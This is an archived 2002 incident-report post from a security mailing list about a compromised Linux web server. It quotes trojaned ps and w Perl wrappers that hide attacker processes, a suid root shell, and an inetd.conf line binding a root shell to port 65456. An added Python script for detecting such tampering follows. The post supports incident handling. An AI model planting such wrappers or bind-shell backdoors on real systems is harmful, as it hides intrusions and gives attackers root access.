nouser - rootkit ?

From: Dan Uscatu (duscatu@phenomedia.ro)
Date: 02/11/02


From: "Dan Uscatu" <duscatu@phenomedia.ro>
To: <incidents@securityfocus.com>
Date: Mon, 11 Feb 2002 01:44:31 +0200


 hi
 i found today something funny happening when i tried to install a web server
 on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some irc servers; fuser - finding the process id's
 for them, but ps not showing them

 some info about the server (unfortunately it wasn't installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 more digging... so i found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x 1 nouser nouser 188 Mar 2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
 grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x 1 root root 64092 Apr 5 2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x 1 nouser nouser 105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x 1 root root 8688 Apr 5 2001 /usr/lib/libxyotps

 there is another file called /usr/lib/libxzotps, but i couldn't find what is
 pointing at that, yet
 no reference found on the web, searching for "libxnotps" or "libxnotps" or
 "libxzotps"

 [root@www nouser]# grep nouser /etc/passwd
 nouser:x:502:502::/sbin/nouser:/bin/bash

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r-- 1 nouser nouser 80092 Mar 2 23:22 broadcast-5000.log
-rw-r--r-- 1 nouser nouser 3057793 Mar 2 23:22 broadcast-full.log
drwxr-xr-x 2 nouser nouser 4096 Mar 2 13:01 Desktop
drwxrwxr-x 4 nouser nouser 4096 Mar 5 19:23 iroffer
-rw-rw-r-- 1 nouser nouser 206865 Mar 5 19:23 iroffer.tar.gz
-rwsr-xr-x 1 root root 13855 Mar 2 13:04 nouser
-rw-rw-r-- 1 root root 2215 Mar 2 23:23 packet0r.pl
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:15 scan-1
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-2
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-3
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:13 war

 of course the suid "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through irc bots

i have scanned the machine using chkrootkit... the only funny thing found
was an inetd.conf, containing:

 [root@www nouser]# cat /etc/inetd.conf
65456 stream tcp nowait root /bin/sh sh

 of course, inetd is not installed :) that points me to the idea that the
process was somehow automated... but i can't find any reference to a rootkit
that does these changes. seems pretty stupid for a rootkit anyway... but i
want to be sure no other major changes were made... before i install the
production server there.

thanks for any comments
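Two checks that follow directly from what Dan found, written up as an added example (this is not code from the post, nor from chkrootkit or any other tool it mentions): compare the PIDs the kernel reports in /proc with what `ps` prints, so that processes a `grep -v` wrapper drops show up anyway (the same mismatch Dan noticed between fuser and ps); pull the filtered names out of such a wrapper to see what it was hiding; and flag system binaries that are scripts rather than ELF, owned by a non-root uid, or implausibly small. The sample ps output and PID set are constructed; the wrapper text is the /bin/ps script quoted in the post.

```python
#!/usr/bin/env python3
"""Added example, not part of the original post. Two userland checks for
the tampering described there: (1) a ps/w wrapper that hides processes via
grep -v leaves PIDs in /proc that ps never prints; (2) the replaced /bin/ps
and /usr/bin/w were tiny Perl scripts owned by 'nouser', not root-owned ELF
binaries. Sample data below is constructed for the demonstration."""
import os
import re

# Constructed sample of `ps -e` output: the wrapper has filtered two PIDs out.
SAMPLE_PS_OUTPUT = """\
  PID TTY          TIME CMD
    1 ?        00:00:04 init
  523 ?        00:00:00 sshd
  611 ?        00:00:01 httpd
"""
# Constructed PID set, as a listing of /proc would show it on the same box.
SAMPLE_PROC_PIDS = {1, 523, 611, 742, 743}

# The /bin/ps wrapper quoted in the post, used as input for hidden_names().
WRAPPER_PS = r"""#!/usr/bin/perl
$xargs =join(' ',@ARGV);
$ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
print "$ps";
"""


def parse_ps_pids(ps_output):
    """PIDs from `ps -e`-style output: first integer column, header skipped."""
    pids = set()
    for line in ps_output.splitlines()[1:]:
        fields = line.split()
        if fields and fields[0].isdigit():
            pids.add(int(fields[0]))
    return pids


def list_proc_pids(proc_root="/proc"):
    """PIDs the kernel reports through /proc, independent of the ps binary."""
    return {int(name) for name in os.listdir(proc_root) if name.isdigit()}


def hidden_pids(proc_pids, ps_pids):
    """PIDs present in /proc that ps did not print. A process that exits
    between the two listings can appear here once; one that stays hidden
    across repeated runs is the real signal."""
    return sorted(set(proc_pids) - set(ps_pids))


def hidden_names(wrapper_source):
    """Names a `grep -v` wrapper filters out of its parent's output, so the
    defender knows what the attacker wanted kept out of sight."""
    return re.findall(r'grep\s+-v\s+\\?"?([^\s\\"|`;]+)', wrapper_source)


def classify_binary(header, uid, size):
    """Reasons a supposed system binary looks replaced. header: leading bytes
    of the file; uid: owner uid; size: bytes. Empty list means nothing odd."""
    reasons = []
    if header.startswith(b"#!"):
        interp = header.split(b"\n", 1)[0][2:].decode(errors="replace").strip()
        reasons.append(f"script, not ELF (interpreter {interp})")
    elif not header.startswith(b"\x7fELF"):
        reasons.append("neither ELF nor script")
    if uid != 0:
        reasons.append(f"owned by uid {uid}, not root")
    if size < 4096:  # real ps/w binaries are tens of kilobytes
        reasons.append(f"only {size} bytes")
    return reasons


def check_binary(path):
    """Run classify_binary() against a real file on disk."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        header = fh.read(128)
    return classify_binary(header, st.st_uid, st.st_size)


if __name__ == "__main__":
    # Offline demonstration on the constructed data above.
    print("hidden PIDs:", hidden_pids(SAMPLE_PROC_PIDS, parse_ps_pids(SAMPLE_PS_OUTPUT)))
    print("names filtered by wrapper:", hidden_names(WRAPPER_PS))
    print("wrapper verdict:", classify_binary(WRAPPER_PS.encode(), 502, 188))
    # On a live Linux host: audit the two binaries the post found replaced.
    for path in ("/bin/ps", "/usr/bin/w"):
        if os.path.exists(path):
            print(path, check_binary(path) or "root-owned ELF, nothing odd")
```

On a live host, pair `hidden_pids(list_proc_pids(), parse_ps_pids(subprocess.check_output(["ps", "-e"], text=True)))` with the fuser/netstat view Dan used, and read `/proc/<pid>/cmdline` for anything that stays hidden across a few runs. These checks only catch userland replacements like the Perl wrappers in the post; a modified kernel could lie in /proc as well, which is why a comparison from a clean boot medium (or a package-manager verify of ps and w) is the stronger confirmation.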

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com